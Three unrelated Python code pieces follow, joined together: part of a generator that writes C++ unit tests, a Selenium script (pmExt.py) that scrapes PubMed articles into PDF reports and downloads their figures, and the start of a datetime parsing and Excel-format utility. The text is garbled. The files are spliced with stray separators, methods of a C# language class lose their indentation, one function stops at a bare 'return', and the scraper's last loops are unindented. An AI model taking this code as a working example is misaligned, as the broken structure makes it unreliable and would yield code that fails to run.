        result.append(WHITESPACE + language.WhiteSpace(0) + 'BOOST_REQUIRE_MESSAGE(' + self.instancename + accessor + protocol_membername + '.' + interface[MessageHeader.Name].PayloadSize() + ' == ' + size_accumulator + ', "ERROR : Size of ' + struct_name + ' payload size does not equal the sum of its separate parts (less pointers to data).");')
    elif unittestfw == UnitTestFramework.CPPuTEST:
        result.append(WHITESPACE + language.WhiteSpace(0) + 'CHECK_EQUAL_TEXT(' + self.instancename + accessor + protocol_membername + '.' + interface[MessageHeader.Name].PayloadSize() + ',' + size_accumulator + ', "ERROR : Size of ' + struct_name + ' payload size does not equal the sum of its separate parts (less pointers to data).");')
    else:
        result.append(WHITESPACE + language.WhiteSpace(0) + "// Incorrect option " + str(unittestfw) + " for FACTORY PAYLOAD SIZE, please see options in class UnitTestFramework")
    result.extend(self.WRITE_DELETERS(to_delete, struct_name, WHITESPACE + language.WhiteSpace(0), unittestfw))
    # Stop scope for local vars redeclared
    result.append(WHITESPACE + language.CloseBrace())
    return result
def WRITE_UNITTEST_TOFROM_BYTESTREAM(self, WHITESPACE='    ', is_arm=False, unittestfw=UnitTestFramework.NO_FW):
    """Emit a unit-test body that writes the message to a byte stream and
    reads it back, checking the round trip.

    Args:
        WHITESPACE: indentation prefix applied to every emitted line.
        is_arm: emit ARM-specific stream handling when True.
        unittestfw: target unit-test framework (see UnitTestFramework).

    Returns:
        list[str]: generated source lines.
    """
    lang = self.language
    indent = WHITESPACE + lang.WhiteSpace(0)
    msg_name = self.message.Name
    descriptor = lang.MessageDescriptor(self.interface, self.message)
    # "struct" when no message descriptor exists, else "message <descriptor>".
    kind = "struct " if descriptor == "" else "message " + descriptor
    lines = [WHITESPACE + lang.FormatComment('Test ' + kind + " " + msg_name + ' to/from byte stream ')]
    # Open a scope so locals created by the helpers can be redeclared per test.
    lines.append(WHITESPACE + lang.OpenBrace())
    lines.append("")
    creation, to_delete = self.WRITE_CREATE_MESSAGE(indent)
    lines.extend(creation)
    lines.append("")
    lines.extend(self.WRITE_MESSAGE_TO_STREAM(indent, is_arm, unittestfw))
    lines.append("")
    from_stream, more_deleters = self.WRITE_MESSAGE_FROM_STREAM(indent, is_arm, unittestfw)
    lines.extend(from_stream)
    to_delete.extend(more_deleters)
    lines.append("")
    lines.extend(self.WRITE_DELETERS(to_delete, msg_name, indent, unittestfw))
    # Close the scope opened above.
    lines.append(WHITESPACE + lang.CloseBrace())
    return lines
class LanguageCsharp:
"""USED"""
def MessageDescriptor(self, interface, struct):
    """Return " [ MsgTypeID = <id> ]" for *struct*, or "" when it has no type id."""
    type_id = interface.GetMessageTypeIDStr(struct)
    if type_id == "":
        return ""
    return " [ MsgTypeID = " + type_id + " ]"
# White space
def WhiteSpace(self, indentationlevels):
    """Return indentation for *indentationlevels* nested levels (level 0 = one unit)."""
    return (indentationlevels + 1) * '    '
'''USED'''
def ByteStreamTypeSharedPtr(self):
    """Shared-pointer spelling of the byte-stream container type."""
    stream_type = self.ByteStreamType()
    return self.SharedPtrToType(stream_type)
'''USED'''
def ByteStreamTypeRawPtr(self):
    """Raw-pointer spelling used when handing the stream buffer to C APIs."""
    element_type = "uint8"
    return self.RawPtrToType(element_type)
'''USED'''
def ByteStreamType(self):
    """C++ container type used to carry a serialized message."""
    return 'std::vector<uint8>'
'''USED'''
def TypedefSharedPtrToType(self, typename):
    """Emit a typedef aliasing the shared-pointer type for *typename*."""
    ptr_type = self.SharedPtrToType(typename)
    alias = self.PtrToTypeName(typename)
    return 'typedef ' + ptr_type + " " + alias
'''USED'''
def TypedefRawPtrToType(self, typename):
return | |
<filename>pmExt.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
PubMed Article Search and Download Python Script (Ver 0.1)
"""
# import modules
import sys
import os
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import argparse
from tqdm import tqdm
import requests
import time
import urllib.request
from urllib.parse import quote
from selenium.webdriver.common.action_chains import ActionChains
from PIL import Image
import textwrap
import logging
import pytextrank
import spacy
# modules for pdf generation
from reportlab.lib.styles import ParagraphStyle
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter, A4
from reportlab.pdfbase.ttfonts import TTFont
from reportlab.pdfbase import pdfmetrics
from reportlab.lib import colors
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import Paragraph
from reportlab.platypus import SimpleDocTemplate
#
class pmExt:
    """PubMed article scraper driven by Selenium.

    ``ext_article`` walks PubMed search results for a keyword query and
    collects per-article metadata (title, citation count, DOI, abstract),
    generates an abstract summary and keyword list with pytextrank, and
    gathers figure URLs.

    NOTE(review): ``ext_article`` reads the module-level global ``root_dir``
    defined later in this script, so the class only works when driven from
    this file — confirm before reusing it elsewhere.
    """

    def __init__(self):
        # Stateless: everything is passed into ext_article().
        pass

    def ext_article(self, keywords, itemN):
        """Search PubMed for *keywords* and harvest metadata for *itemN* articles.

        Args:
            keywords (str): query typed into the PubMed search box.
            itemN (int): number of articles to visit (the first article is
                handled inline, then the main loop runs itemN - 1 times).

        Returns:
            tuple: (title_list, citation_list, doi_list, abstract_list,
            abstract_summary_list, abstract_keyword_list, figure_list).
            The first six lists are aligned by article index; figure_list
            holds 9 slots per article ('no_fig' fills empty slots).
        """
        # make directory
        self.create_dir(root_dir, keywords)
        title_list = []
        doi_list = []
        abstract_list = []
        abstract_summary_list = []
        abstract_keyword_list = []
        citation_list = []
        figure_list = []
        # scrolling google browser
        try:
            # browser extraction part ####
            chrome_opt = webdriver.ChromeOptions()
            chrome_opt.add_argument('--disable-gpu')
            # NOTE(review): hard-coded chromedriver path — only valid on the
            # author's machine.
            pathx = "/Users/uksu/Downloads/chromedriver"
            # NOTE(review): executable_path / find_element_by_* are the
            # Selenium 3 APIs, removed in Selenium 4 — presumably this script
            # requires selenium<4; confirm the pinned version.
            browser = webdriver.Chrome(executable_path=pathx,options=chrome_opt)
            ActionChains(browser).key_down(Keys.CONTROL).click().key_up(Keys.CONTROL).perform()
            url = 'https://pubmed.ncbi.nlm.nih.gov/?term=' + quote(keywords.encode('utf-8')) + '&size=20'
            browser.get(url)
            time.sleep(1)
            element = browser.find_element_by_tag_name("body")
            # Searching environment setting: toggle the first three filter
            # checkboxes on the results page.
            elementx = browser.find_element_by_xpath('//*[@id="static-filters-form"]/div/div[1]/div[1]/ul/li[1]/label')
            browser.execute_script("arguments[0].click();", elementx)
            time.sleep(1)
            elementx = browser.find_element_by_xpath('//*[@id="static-filters-form"]/div/div[1]/div[1]/ul/li[2]/label')
            browser.execute_script("arguments[0].click();", elementx)
            time.sleep(1)
            elementx = browser.find_element_by_xpath('//*[@id="static-filters-form"]/div/div[1]/div[1]/ul/li[3]/label')
            browser.execute_script("arguments[0].click();", elementx)
            time.sleep(1)
            # click first article
            elementx = browser.find_element_by_xpath('//*[@id="search-results"]/section/div[1]/div/article[1]/div[2]/div[1]/a')
            browser.execute_script("arguments[0].click();", elementx)
            # Click the adjacent-navigation control twice.
            # NOTE(review): presumably this repositions onto the intended
            # first result after the filters re-sorted the list — confirm
            # against the live site layout.
            first_article = browser.find_element_by_xpath('//*[@id="adjacent-navigation"]/div[2]/a/span[2]')
            browser.execute_script("arguments[0].click();", first_article)
            time.sleep(1)
            first_article = browser.find_element_by_xpath('//*[@id="adjacent-navigation"]/div[2]/a/span[2]')
            browser.execute_script("arguments[0].click();", first_article)
            time.sleep(1)
            ## extract first article
            # title_list
            t_path = '//*[@id="full-view-heading"]/h1'
            title_link = browser.find_element_by_xpath(t_path)
            title_list_tmp = title_link.text
            title_list.append(title_list_tmp)
            # citation list ('0' recorded when the cited-by section is absent)
            try:
                c_path = '//*[@id="citedby"]/h2/em[1]'
                citation_link = browser.find_element_by_xpath(c_path)
                citation_list_tmp = citation_link.text
                citation_list.append(citation_list_tmp)
            except:
                print("!! No citation of this paper !!")
                citation_list_tmp = '0'
                citation_list.append(citation_list_tmp)
            # doi_list
            try:
                d_path = '//*[@id="full-view-identifiers"]/li[2]/span/a'
                doi_link = browser.find_element_by_xpath(d_path)
                doi_list_tmp = doi_link.get_attribute('href')
                doi_list.append(doi_list_tmp)
            except:
                doi_list_tmp = "No DOI!!"
                doi_list.append(doi_list_tmp)
            ## abstract_list
            a_path = '//*[@id="enc-abstract"]/p'
            abstract_link = browser.find_element_by_xpath(a_path)
            abstract_list_tmp = abstract_link.text
            abstract_list.append(abstract_list_tmp)
            # abstract_summary
            # load a spaCy model and set the environment
            nlp = spacy.load("en_core_web_sm")
            # logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
            # logger = logging.getLogger("PyTR")
            tr = pytextrank.TextRank(logger=None)
            nlp.add_pipe(tr.PipelineComponent, name="textrank", last=True)
            doc = nlp(abstract_list_tmp)
            # temporary abstract_summary_list
            abstract_summary_list_tmp = [];
            for ab_summary in doc._.textrank.summary(limit_phrases=1, limit_sentences=2):
                abstract_summary_list_tmp.append(ab_summary)
            abstract_summary_list.append(str(abstract_summary_list_tmp))
            # temporary abstract_keyword_list
            abstract_keyword_list_tmp = [];
            for phrase in doc._.phrases[:5]: ## top 5 keywords
                abstract_keyword_list_tmp.append(phrase)
            abstract_keyword_list.append(str(abstract_keyword_list_tmp))
            # figure_list: probe nine figure slots; each article contributes
            # exactly 9 entries ('no_fig' when a slot is empty).
            j = 1
            while j < 10:
                try:
                    f_path = '//*[@id="slides-container"]/figure['+ str(j) + ']/a'
                    figure_link = browser.find_element_by_xpath(f_path)
                    figure_list_tmp = figure_link.get_attribute('href')
                    figure_list.append(figure_list_tmp)
                except:
                    print("!! No more figures in this paper !!")
                    figure_list.append('no_fig')
                # figure_list.remove('no_fig')
                j += 1
            time.sleep(1)
            # go to next article
            next_article = browser.find_element_by_xpath('//*[@id="adjacent-navigation"]/div[2]/a/span[2]')
            browser.execute_script("arguments[0].click();", next_article)
            time.sleep(1)
        except Exception as e:
            # Failures during setup / first article are printed, not
            # re-raised; the main loop below still assumes `browser` exists.
            print(e)
        ## main run: remaining itemN - 1 articles (first handled above)
        i = 0
        while i < itemN - 1:
            # title_list
            t_path = '//*[@id="full-view-heading"]/h1'
            title_link = browser.find_element_by_xpath(t_path)
            title_list_tmp = title_link.text
            title_list.append(title_list_tmp)
            # citation list
            try:
                c_path = '//*[@id="citedby"]/h2/em[1]'
                citation_link = browser.find_element_by_xpath(c_path)
                citation_list_tmp = citation_link.text
                citation_list.append(citation_list_tmp)
            except:
                print("!! No citation of this paper !!")
                citation_list_tmp = '0'
                citation_list.append(citation_list_tmp)
            # doi_list
            try:
                d_path = '//*[@id="full-view-identifiers"]/li[2]/span/a'
                doi_link = browser.find_element_by_xpath(d_path)
                doi_list_tmp = doi_link.get_attribute('href')
                doi_list.append(doi_list_tmp)
            except:
                doi_list_tmp = "No DOI!!"
                doi_list.append(doi_list_tmp)
            # abstract_list
            a_path = '//*[@id="enc-abstract"]/p'
            abstract_link = browser.find_element_by_xpath(a_path)
            abstract_list_tmp = abstract_link.text
            abstract_list.append(abstract_list_tmp)
            # load a spaCy model and set the environment
            # NOTE(review): the model and pipeline are re-loaded on every
            # iteration — this duplicates the first-article setup above.
            nlp = spacy.load("en_core_web_sm")
            # logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
            # logger = logging.getLogger("PyTR")
            tr = pytextrank.TextRank(logger=None)
            nlp.add_pipe(tr.PipelineComponent, name="textrank", last=True)
            doc = nlp(abstract_list_tmp)
            # temporary abstract_summary_list
            abstract_summary_list_tmp = [];
            for ab_summary in doc._.textrank.summary(limit_phrases=1, limit_sentences=2):
                abstract_summary_list_tmp.append(ab_summary)
            abstract_summary_list.append(str(abstract_summary_list_tmp))
            # temporary abstract_keyword_list
            abstract_keyword_list_tmp = [];
            for phrase in doc._.phrases[:5]: ## top 5 keywords
                abstract_keyword_list_tmp.append(phrase)
            abstract_keyword_list.append(str(abstract_keyword_list_tmp))
            # figure_list (9 slots per article, as above)
            j = 1
            while j < 10:
                try:
                    f_path = '//*[@id="slides-container"]/figure['+ str(j) + ']/a'
                    figure_link = browser.find_element_by_xpath(f_path)
                    figure_list_tmp = figure_link.get_attribute('href')
                    figure_list.append(figure_list_tmp)
                except:
                    print("!! No more figures in this paper !!")
                    figure_list.append('no_fig')
                # figure_list.remove('no_fig')
                j += 1
            # go to next article
            # NOTE(review): uses div[3] here while the first-article block
            # uses div[2] — presumably the nav layout differs once inside the
            # article pages; confirm against the site.
            try:
                next_article = browser.find_element_by_xpath('//*[@id="adjacent-navigation"]/div[3]/a/span[2]')
                browser.execute_script("arguments[0].click();", next_article)
                time.sleep(0.5)
                i += 1
            except:
                print("### End of the searching pages ###")
                break
        browser.quit()
        return title_list, citation_list, doi_list, abstract_list, abstract_summary_list, abstract_keyword_list, figure_list

    def create_dir(self, root_dir, name):
        """Create <root_dir>/<name>, creating *root_dir* first if needed.

        OSError with errno 17 (EEXIST) is tolerated; anything else re-raises.
        """
        try:
            if not os.path.exists(root_dir):
                os.makedirs(root_dir)
                time.sleep(0.2)
                path = (name)
                sub_directory = os.path.join(root_dir, path)
                if not os.path.exists(sub_directory):
                    os.makedirs(sub_directory)
            else:
                path = (name)
                sub_directory = os.path.join(root_dir, path)
                if not os.path.exists(sub_directory):
                    os.makedirs(sub_directory)
        except OSError as e:
            if e.errno != 17:
                raise
            pass
        return
# HELP Section
# Command line exposes only --version; the search terms are collected
# interactively below.
parser = argparse.ArgumentParser(description='## Search and Extract Papers using PubMed Engine ##', formatter_class=argparse.RawDescriptionHelpFormatter,
    epilog='''\
version history:
[Ver 0.21] bug fixed for duplicated articles over limit
[ver 0.20] added an abstract summary as an output using TextRank algorithm
[ver 0.10] release of this script (2020.08.01)
++ Copyright at <EMAIL> / <EMAIL> ++
''')
# parser.add_argument("Keyword", help="Keywords without space",)
# parser.add_argument("Item_number", help="Searching item number")
# parser.add_argument("URL_output.txt", help="URL text files")
parser.add_argument('--version', action='version', version='Version 0.1')
parser.parse_args()
# assign input arguments (interactive prompts instead of CLI positionals)
print("+++++++++++++++++++++++++++++++++++++++++++++")
keyword = input('## Enter the keywords: ')
print("+++++++++++++++++++++++++++++++++++++++++++++")
itemN = input('## How many articles do you want ?: ')
print("+++++++++++++++++++++++++++++++++++++++++++++")
# root directory
root_dir = "PubMed_Reports/"
# MAIN RUN
# NOTE(review): `response` is bound to the class object itself; `response()`
# below instantiates it at the call site.
response = pmExt
title_list, citation_list, doi_list, abstract_list, abstract_summary_list, abstract_keyword_list, figure_list = response().ext_article(keyword, int(itemN))
# set path: figures for this keyword are saved under PubMed_Reports/<keyword>
path = root_dir + keyword
# link downloads
print("")
print(" +++++++++++++++++++++++++++++++++++++ NOW Processing IS STARTING +++++++++++++++++++++++++++++++++++++ ")
print("")
print(" [ Now downloading article information !! ] ")
# Superseded plain-text report writer, kept for reference:
# with open(os.path.join('./' + root_dir + '/', keyword + '.txt'), 'w', encoding="utf-8") as f:
#     pbar = enumerate(tqdm(title_list))
#     for item_ind, item in pbar:
#         f.write("%s\n" % " ")
#         f.write("[ Article" + "-" + '%04d' %(item_ind + 1) + " ]: " + "%s\n" % item)
#         f.write("Citation" + ": " + "%s\n" % textwrap.fill(citation_list[item_ind], width=150))
#         f.write("doi" + ": " + "%s\n" % textwrap.fill(doi_list[item_ind], width=150))
#         f.write("%s\n" % textwrap.fill(abstract_list[item_ind], width=150))
#         f.write("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
#         f.write("%s\n" % " ")
#         time.sleep(0.01)
# set the template for pdf output
report = SimpleDocTemplate(os.path.join('./' + root_dir + '/' + "pmExt_ArticleReport-" + keyword + '.pdf'), pagesize=A4)
report_style = getSampleStyleSheet()
# report_style.list()
# Custom paragraph styles, color-coded per field.
report_style.add(ParagraphStyle(name='Paragraph', spaceAfter=10))
report_style.add(ParagraphStyle(name='content_title',
                                fontFamily='Helvetica',
                                fontSize=12,
                                leading=15,
                                textColor=colors.HexColor("#2E2D30")))
report_style.add(ParagraphStyle(name='content_citation',
                                fontFamily='Helvetica',
                                fontSize=10,
                                textColor=colors.HexColor("#D65720")))
report_style.add(ParagraphStyle(name='content_doi',
                                fontFamily='Times-Roman',
                                fontSize=11,
                                leading=15,
                                textColor=colors.HexColor("#285DC9")))
report_style.add(ParagraphStyle(name='content_line',
                                fontFamily='Times-Roman',
                                fontSize=11,
                                leading=15,
                                textColor=colors.HexColor("#050000")))
report_style.add(ParagraphStyle(name='content_summary',
                                fontFamily='Times-Roman',
                                fontSize=11,
                                leading=15,
                                textColor=colors.HexColor("#1A6304")))
report_style.add(ParagraphStyle(name='content_keyword',
                                fontFamily='Times-Roman',
                                fontSize=11,
                                leading=15,
                                textColor=colors.HexColor("#A10613")))
# title
report_title = Paragraph("pmExt Reports <ver 0.22>", report_style['Heading1'])
# main run
pbar = enumerate(tqdm(title_list))
contents = []
contents.append(report_title)
# run loop: one group of paragraphs per article
for item_ind, item in pbar:
    # article number
    paragraph_1 = Paragraph(
        ("[ Article" + "-" + '%04d' %(item_ind + 1) + " ]"),
        report_style['Heading2']
    )
    # title
    paragraph_2= Paragraph(
        item,
        report_style['content_title']
    )
    # citation number
    paragraph_3 = Paragraph(
        ("Citation: " + "%s\n" % citation_list[item_ind]),
        report_style['content_citation']
    )
    # doi link
    paragraph_4 = Paragraph(
        ("DOI: " + "%s\n" % doi_list[item_ind]),
        report_style['content_doi']
    )
    # abstract
    paragraph_5 = Paragraph(
        abstract_list[item_ind],
        report_style['BodyText']
    )
    contents.append(paragraph_1)
    contents.append(paragraph_2)
    contents.append(paragraph_3)
    contents.append(paragraph_4)
    contents.append(paragraph_5)
# Render the assembled story to the PDF after the loop.
report.build(contents)
print(" ")
print(" [ Now downloading abstract summary !! ] ")
# with open(os.path.join('./' + root_dir + '/', keyword + '_abstract_summary' + '.txt'), 'w', encoding="utf-8") as f:
# pbar = enumerate(tqdm(title_list))
# for item_ind, item in pbar:
# f.write("%s\n" % " ")
# f.write("[ Article" + "-" + '%04d' %(item_ind + 1) + " ]: " + "%s\n" % item)
# f.write("Citation" + ": " + "%s\n" % textwrap.fill(citation_list[item_ind], width=150))
# f.write("doi" + ": " + "%s\n" % textwrap.fill(doi_list[item_ind], width=150))
# f.write("%s\n" % " ")
# f.write("%s\n" % textwrap.fill(abstract_summary_list[item_ind], width=150))
# f.write("%s\n" % " ")
# f.write('# Keywords ' + "%s\n" % textwrap.fill(abstract_keyword_list[item_ind]))
# f.write("++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
# f.write("%s\n" % " ")
# time.sleep(0.01)
#
# set the template for pdf output
summary = SimpleDocTemplate(os.path.join('./' + root_dir + '/' + "pmExt_AbstractSummary-" + keyword + '.pdf'), pagesize=A4)
# title
summary_title = Paragraph("pmExt Reports (Abstract Summary)", report_style['Heading1'])
# main run
pbar = enumerate(tqdm(title_list))
contents_sum = []
contents_sum.append(summary_title)
# run loop
for item_ind, item in pbar:
# article number
paragraph_1 = Paragraph(
("[ Article" + "-" + '%04d' %(item_ind + 1) + " ]"),
report_style['Heading2']
)
# title
paragraph_2= Paragraph(
item,
report_style['content_title']
)
# citation number
paragraph_3 = Paragraph(
("Citation: " + "%s\n" % citation_list[item_ind]),
report_style['content_citation']
)
# doi link
paragraph_4 = Paragraph(
("DOI: " + "%s\n" % doi_list[item_ind]),
report_style['content_doi']
)
# abstract summary
paragraph_5 = Paragraph(
"+++++++++++++++++++++++++++ Auto-Summary ++++++++++++++++++++++++++++",
report_style['content_line']
)
# abstract summary
paragraph_6 = Paragraph(
abstract_summary_list[item_ind],
report_style['content_summary']
)
# abstract summary
paragraph_7 = Paragraph(
"++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",
report_style['content_line']
)
# abstract keywords
paragraph_8 = Paragraph(
abstract_keyword_list[item_ind],
report_style['content_keyword']
)
contents_sum.append(paragraph_1)
contents_sum.append(paragraph_2)
contents_sum.append(paragraph_3)
contents_sum.append(paragraph_4)
contents_sum.append(paragraph_5)
contents_sum.append(paragraph_6)
contents_sum.append(paragraph_7)
contents_sum.append(paragraph_8)
summary.build(contents_sum)
# save figures
print(" ")
print(" [ Now downloading article figures !! ] ")
pbar2 = enumerate(tqdm(figure_list))
indN = len(title_list) + 1
n_tmp = 0
ind2_tmp = 1
fig_mark = 0
nofig_mark = 0
for item_ind2, item2 in pbar2:
if 'no_fig' not in item2:
filename = "Article" + "_" + '%04d' % (n_tmp + 1) + "_Fig" + '%02d' % (ind2_tmp) + ".jpg"
urllib.request.urlretrieve(item2, os.path.join(path, filename))
fig_mark += 1
else:
nofig_mark += 1
ind2_tmp = 0
mark_diff = item_ind2 - (nofig_mark+fig_mark)
ind2_tmp = ind2_tmp + 1
n_tmp = round((item_ind2 - ind2_tmp + 1 - mark_diff)/9)
print("")
print(" +++++++++++++++++++++++++++++++++++++ NOW EXTRACTION FINISHED ++++++++++++++++++++++++++++++++++++++++ | |
import datetime as dt_module
from dynamicmethod import dynamicmethod
from collections import OrderedDict
# Public API.  'DATE_FORMATS' is exported alongside the other two format
# lists (the previous list repeated 'DATETIME_FORMATS' and omitted it).
__all__ = ['datetime', 'date', 'time',
           'make_datetime', 'str_datetime',
           'DATE_FORMATS', 'TIME_FORMATS', 'DATETIME_FORMATS']
# Date-only formats; the first entry doubles as the default output format.
DATE_FORMATS = [
    '%m/%d/%Y', '%Y-%m-%d', '%y-%m-%d', '%m/%d/%y',  # '2019-04-17', '04/17/2019'
    '%b %d %Y', '%b %d, %Y',  # 'Apr 17 2019', 'Apr 17, 2019'
    '%d %b %Y', '%d %b, %Y',  # '17 Apr 2019', '17 Apr, 2019'
    '%B %d %Y', '%B %d, %Y',  # 'April 17 2019', 'April 17, 2019'
    '%d %B %Y', '%d %B, %Y',  # '17 April 2019', '17 April, 2019'
]

# Time-only formats; the first entry doubles as the default output format.
TIME_FORMATS = [
    '%H:%M:%S',        # '14:24:55'
    '%I:%M:%S %p',     # '02:24:55 PM'
    '%I:%M:%S.%f %p',  # '02:24:55.000200 PM'
    '%I:%M %p',        # '02:24 PM'
    '%H:%M:%S.%f',     # '14:24:55.000200'
    '%H:%M',           # '14:24'
    '%H:%M:%S+00:00',  # '14:24:55+00:00'
]

# Every "<date> <time>" combination, then the bare date and time formats.
DATETIME_FORMATS = [f'{d} {t}' for t in TIME_FORMATS for d in DATE_FORMATS]
DATETIME_FORMATS += DATE_FORMATS + TIME_FORMATS

# strftime directive -> Excel number-format token.  Order matters: the
# replacements in datetime_fmt_to_excel() are applied sequentially.
DATETIME_FORMAT_TO_EXCEL = OrderedDict([
    ('%a', 'ddd'), ('%A', 'dddd'), ('%w', 'ddd'), ('%d', 'dd'),
    ('%b', 'mmm'), ('%B', 'mmmm'), ('%m', 'mm'),
    ('%y', 'yy'), ('%Y', 'yyyy'),
    ('%H', 'hh'), ('%I', 'h'), ('%p', 'AM/PM'),
    ('%M', 'mm'),
    ('%S', 'ss'),
    ('%f', '00'),
    ('%z', ''), ('%Z', ''), ('%j', ''), ('%U', ''), ('%W', ''),
    ('%c', 'ddd mmm dd hh:mm:ss yyyy'),
    ('%x', 'mm/dd/yyyy'),
    ('%X', 'hh:mm:ss'),
    ('%%', '%'),
])
def make_datetime(dt_string, formats=None):
    """Parse *dt_string* into a ``datetime.datetime``.

    Non-string inputs are returned unchanged, so already-constructed
    datetime objects pass straight through.

    Args:
        dt_string (str): Datetime string '04:00 PM' ...
        formats (list)[None]: List of acceptable datetime string formats;
            defaults to DATETIME_FORMATS.

    Returns:
        dt (datetime.datetime): Parsed datetime (or *dt_string* itself when
        it is not a str).

    Raises:
        ValueError: If no format (nor ISO parsing) matches *dt_string*.
    """
    if not isinstance(dt_string, str):
        return dt_string
    if formats is None:
        formats = DATETIME_FORMATS

    for fmt in formats:
        try:
            return dt_module.datetime.strptime(dt_string, fmt)
        except Exception:  # strptime raises ValueError/TypeError on mismatch
            pass

    try:  # Fall back to ISO 8601 (fromisoformat is Python 3.7+).
        return dt_module.datetime.fromisoformat(dt_string)
    except Exception:  # AttributeError on interpreters without fromisoformat
        pass

    raise ValueError('Invalid datetime format {}. Allowed formats are {}'.format(repr(dt_string), repr(formats)))
def str_datetime(dt, formats=None):
    """Return *dt* formatted as a string.

    Strings pass through unchanged.  *formats* may be a single strftime
    format or a list (only the first entry is used); None falls back to
    DATETIME_FORMATS.
    """
    if isinstance(dt, str):
        return dt  # already a string
    if isinstance(formats, str):
        fmt = formats
    elif formats is None:
        fmt = DATETIME_FORMATS[0]
    else:
        fmt = formats[0]
    return dt.strftime(fmt)
def datetime_fmt_to_excel(fmt):
    """Translate a strftime format string into an Excel number format."""
    excel_fmt = fmt
    # Apply the ordered replacement table sequentially.
    for directive, excel_token in DATETIME_FORMAT_TO_EXCEL.items():
        excel_fmt = excel_fmt.replace(directive, excel_token)
    return excel_fmt
# Epoch reference (1970-01-01 00:00:00, naive) supplying per-field defaults.
# NOTE(review): utcfromtimestamp is deprecated since Python 3.12, but the
# naive result (tzinfo=None) is what DEFAULT_PARAMS below relies on.
DEFAULT_DT = dt_module.datetime.utcfromtimestamp(0)
class DtMixin(object):
    """Mixin adding string parsing/formatting and Excel cell encode/decode
    to the stdlib-derived ``datetime``/``date``/``time`` wrappers below.
    """

    # Default output format and the formats tried when parsing strings.
    str_format = DATETIME_FORMATS[0]
    formats = DATETIME_FORMATS
    # Per-field defaults taken from the epoch datetime (DEFAULT_DT above).
    DEFAULT_PARAMS = OrderedDict([('year', DEFAULT_DT.year), ('month', DEFAULT_DT.month), ('day', DEFAULT_DT.day),
                                  ('hour', DEFAULT_DT.hour), ('minute', DEFAULT_DT.minute),
                                  ('second', DEFAULT_DT.second), ('microsecond', DEFAULT_DT.microsecond),
                                  ('tzinfo', DEFAULT_DT.tzinfo), ('fold', DEFAULT_DT.fold)])

    def __init__(self, dt=None, *args, str_format=None, formats=None, **kwargs):
        # Arguments are consumed by the subclasses' __new__ (which also sets
        # the per-instance str_format/formats); nothing to do here.
        super().__init__()  # Object init

    @classmethod
    def get_params(cls, defaults, dt, args, kwargs, formats=None):
        """Return a list of keyword arguments for the given positional, keyword and default values.

        Args:
            defaults (OrderedDict): Ordered dict of key word names with default values. None value means optional.
            dt (object/int)[None]: Object datetime, date, time or integer year or hour is assumed.
            args (tuple): Positional arguments
            kwargs (dict): Key word arguments
            formats (list)[None]: List of acceptable datetime string formats.

        Returns:
            params (dict): Dictionary of mapped name arguments.
        """
        defaults = defaults.copy()
        params = {}

        # If datetime get the values as default values (override with kwargs for duplicate values)
        if isinstance(dt, str):
            dt = make_datetime(dt, formats or cls.formats)
        elif isinstance(dt, (int, float)) and len(args) + len(kwargs) < 2:
            # A lone number is treated as a POSIX timestamp.
            dt = dt_module.datetime.utcfromtimestamp(dt)
        elif isinstance(dt, (int, float)):
            # Assume integer is positional argument year or hour.
            args = (dt,) + args
            dt = None

        # Get datetime attributes
        if isinstance(dt, (dt_module.datetime, dt_module.date, dt_module.time)):
            for name in defaults:
                value = getattr(dt, name, None)
                if value is not None:
                    defaults[name] = value

        # Find positional values and keyword values
        arg_len = len(args)
        for i, name in enumerate(defaults.keys()):
            if i < arg_len:
                params[name] = args[i]
            else:
                value = kwargs.get(name, defaults.get(name, None))
                if value is not None:
                    params[name] = value

        return params

    @classmethod
    def get_init_formats(cls, str_format=None, formats=None):
        """Get the str_format and formats from the initial args."""
        if formats is None:
            formats = cls.formats
        if str_format is None:
            str_format = cls.str_format
        # str_format may itself be a list/tuple of formats; split it up.
        if isinstance(str_format, (list, tuple)):
            formats = str_format
            str_format = str_format[0]
        elif str_format is None:  # cls.str_format was None as well
            str_format = formats[0]
        return str_format, formats

    @dynamicmethod  # Run as a classmethod or instancemethod
    def decode(self, item):
        """Convert an Excel cell (or a raw value) into an instance of this class."""
        # Get the class object
        cls = self
        if isinstance(self, (dt_module.datetime, dt_module.date, dt_module.time)):
            cls = self.__class__

        # Get the item value
        try:
            value = item.Value
            if isinstance(value, (int, float)) and value < 1:
                # Convert excel hours to seconds? 86400 seconds == 24 hr? Only gets here from time value.
                value = value * 86400
        except (ValueError, TypeError, AttributeError, Exception):
            value = item

        # Convert the value to a datetime object
        if not isinstance(value, cls):
            value = cls(value, str_format=self.str_format, formats=self.formats)
        return value

    @dynamicmethod  # Run as a classmethod or instancemethod
    def encode(self, item, value):
        """Write *value* into Excel cell *item* and set its number format."""
        # Get the class object
        cls = self
        if isinstance(self, (dt_module.datetime, dt_module.date, dt_module.time)):
            cls = self.__class__

        # Convert to this object type
        # NOTE(review): isinstance checks against the module-level `datetime`
        # wrapper class defined later in this file, not dt_module.datetime.
        if not isinstance(value, datetime):
            value = cls(dt=value, str_format=self.str_format, formats=self.formats)
        item.NumberFormat = datetime_fmt_to_excel(self.str_format or self.formats[0])
        item.Value = str(value)

    def __str__(self):
        # str_datetime accepts either a single format or a list of formats.
        return str_datetime(self, self.str_format or self.formats)
class datetime(dt_module.datetime, DtMixin):
    """``datetime.datetime`` subclass that parses strings/timestamps at
    construction time and remembers its preferred string format.
    """

    # Re-declared here (same values as DtMixin) so the class carries its own
    # explicit defaults.
    formats = DATETIME_FORMATS
    str_format = DATETIME_FORMATS[0]
    DEFAULT_PARAMS = OrderedDict([('year', DEFAULT_DT.year), ('month', DEFAULT_DT.month), ('day', DEFAULT_DT.day),
                                  ('hour', DEFAULT_DT.hour), ('minute', DEFAULT_DT.minute),
                                  ('second', DEFAULT_DT.second), ('microsecond', DEFAULT_DT.microsecond),
